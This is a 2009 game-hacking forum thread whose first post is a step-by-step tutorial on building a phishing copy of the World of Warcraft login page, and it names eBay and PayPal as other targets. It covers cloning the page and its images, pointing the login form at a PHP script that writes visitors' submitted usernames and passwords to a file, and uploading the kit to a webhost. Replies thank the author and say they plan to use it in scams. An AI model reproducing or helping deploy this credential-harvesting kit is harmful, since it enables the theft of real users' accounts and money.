Phisher Maker [TuT] menu
100% Up to 1000$
4.9/5
150% Up to 200$ & 20 Freespins
4.8/5
Up to 1 BTC
4.9/5
20% Cashback
4.8/5
Up to 5 BTC
4.8/5
100% Up to 1 BTC
4.7/5
Up to 5 BTC
4.7/5
110% Up to 1 BTC
4.6/5

User Tag List

Results 1 to 7 of 7
  1. #1
    Sub-Zero5's Avatar Active Member
    Reputation
    39
    Join Date
    Oct 2008
    Posts
    77
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Phisher Maker [TuT]

    Phisher Maker [TuT]
    Whats up?

    OK, So today im gonna show you how to make a phisher page of any site, [eBay paypal or world of warcraft] althought dont come running to me if you get caught.

    What's First?

    OK, first we gonna use the world of warcraft login page for a tutorial Hyperlink! So go their! now once the page has loaded right click the page and select "save as".

    Now on your going to have a file and a folder on your desktop, open the .html file. doesnt look like the real page does it? so before we make it logg things to files we needs to make it look like the real deal. go into the folder [login.xml_files] and open all the css files with a text editor [notepad if your on windows] Keep those windows open but minimize them for now.

    Now go back to the real login page for blizzard, if your in firefox select Tools>Page info>Media. Now click on the urls below, each one is the url to a picture, find the urls to the pictures that YOUR phisher doesnt have. EG the background, the login button, and the little world of warcraft logo. Copy the url to clipboard, then go back to the .css files, search the name of the image [the name can be found at the end of the url you just copied] in the .css file.

    So For instance the url at the top is Skin-wow-blank.jpg, copy the url and search that name in the css files. and yes search all of them.

    When you find the strig it looks like this.
    Code:
    url('../_images/skin-wow-blank.jpg') #000000 no-repeat center top !important; text-align:center }
    Don't bother with anything other then the skin-wow-blank.jpg, dlete everything inside of the ' ' and paste in the url we copied before. so in the end you will have.
    Code:
    url('https://us.battle.net/login/_themes/wow/_images/skin-wow-blank.jpg') #000000 no-repeat center top !important; text-align:center }
    Now refresh your phisher tab or window, and HUH? the background is their. you need to follow the exact same steps for this page, and in that case for all sites that dont display the images.

    Logging data to files

    Now With the hard part over heres something nice and simple, open your phishers .html file [login.xml.xhtml] with text editor or notepad. Now search for "action=" this tells what the button is to do upon being clicked, if we leave it it logs them into blizzard, but ofc we dont what that.

    if done correctly you find this
    Code:
    action="/login/login.xml?ref=https%3A%2F%2Fwww.worldofwarcraft.com%2Faccount%2F&app=wam"
    Now Change everything insde the " " to SSL.php

    End result
    Code:
    action="SSL.php">
    Now We Simply need to download the SSL.php and do the final editing. download it from the bottom of the page, once done, open it up with text editor or notepad,
    Code:
     $value) {
    
    fwrite($handle, $variable);
    
    fwrite($handle, "=");
    
    fwrite($handle, $value);
    
    fwrite($handle, "\r\n");
    
    }
    
    fwrite($handle, "\r\n");
    
    fclose($handle);
    
    exit;
    
    ?>
    Thats the contents of the file, see at the top, Header ('location: http:// and so on? thats the url you will be redirected to when the php file has done its job, by default it sends you to the normal login page, you can change it to wherever make sure their is a space between : and the ' otherwise it wont work.

    secondly the logged-3332.html is the file that will be created with the logged details, you can change it to what ever you wont just dont change the extension [.html] if you change it to .txt it mite not work because some server dont allow .txt files on their servers anymore so just change the name if needed.

    Done?

    Yup, everything is ready to go, just upload the .html the SSL.php and the folder [Make sure the folder is called the EXACT same as it is on your desktop] to your online webhost.


    SSL.php Download!
    Last edited by Sub-Zero5; 06-10-2009 at 11:09 AM.

    Phisher Maker [TuT]
  2. #2
    Sub-Zero5's Avatar Active Member
    Reputation
    39
    Join Date
    Oct 2008
    Posts
    77
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by zomgwtfbbqyayz View Post
    Thanks for this, I am going to try this. Not the real computer expert here :P, I hope I can manage, lol. +Rep for the add
    You will, just go slowly and you should manage.

  3. #3
    Slim Shady's Avatar Member
    Reputation
    1
    Join Date
    Apr 2009
    Posts
    12
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Sub-Zero5 View Post
    You will, just go slowly and you should manage.
    You can't garantee that a scam will "work". He might setup up the phisher, but it's no clear if he's going to get any accounts. Anyway , nice thread, I'm also going to try it.

  4. #4
    Zaphry's Avatar Contributor
    Reputation
    176
    Join Date
    Dec 2007
    Posts
    897
    Thanks G/R
    12/9
    Trade Feedback
    17 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Little less *Bling* blue would be better ;# (hurts eyes when reading)

    Playing a game for the graphics is like watching porn for the storyline.


  5. #5
    Mathmech's Avatar Active Member
    Reputation
    24
    Join Date
    Dec 2008
    Posts
    143
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by zaphry View Post
    Little less *Bling* blue would be better ;# (hurts eyes when reading)
    qft.
    But really, It's pretty easy to setup your own instead of ripping pics from blizzards official site.
    Just dl the files from here
    upload the files to a ftp
    ???
    profit

  6. #6
    comos's Avatar Member
    Reputation
    1
    Join Date
    Dec 2007
    Posts
    40
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hey thx i will try it when i finish the fbm scam

  7. #7
    Sub-Zero5's Avatar Active Member
    Reputation
    39
    Join Date
    Oct 2008
    Posts
    77
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    OK i changed the text to deep sky blue [grey test looks so boring]

Similar Threads

  1. [Tut for noobs] Realmlist Maker
    By holmen93 in forum WoW EMU Programs
    Replies: 6
    Last Post: 04-11-2009, 07:32 AM
  2. Need portal maker! or working TuT!
    By Tobii in forum World of Warcraft Emulator Servers
    Replies: 2
    Last Post: 09-06-2007, 09:14 AM
  3. Replies: 2
    Last Post: 08-15-2006, 12:13 AM
  4. Another AH Money Maker
    By Matt in forum World of Warcraft Exploits
    Replies: 7
    Last Post: 03-22-2006, 01:05 PM
All times are GMT -5. The time now is 09:15 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search